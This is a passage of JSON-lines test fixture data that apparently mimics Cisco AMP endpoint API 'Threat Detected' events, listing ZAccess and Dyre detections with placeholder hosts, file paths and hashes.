c20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":790000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215108","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab-temp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab-temp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jar_cache4855455380559478946.tmp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\jar_cache4855455380559478946.tmp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255906150351000,"timestamp":1610705118,"timestamp_nanoseconds":24000000,"date":"2021-01-15T10:05:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255906150350874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":715000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084315","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084314","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":677000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084313","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":501000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364373045149720","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1089625888-3054005746-3039903294-1000\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":4016,"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":441000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149719","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":149000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182417","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149717","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149716","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182419","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":923000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182418","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":740000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182415","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":717000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182414","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182412","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} 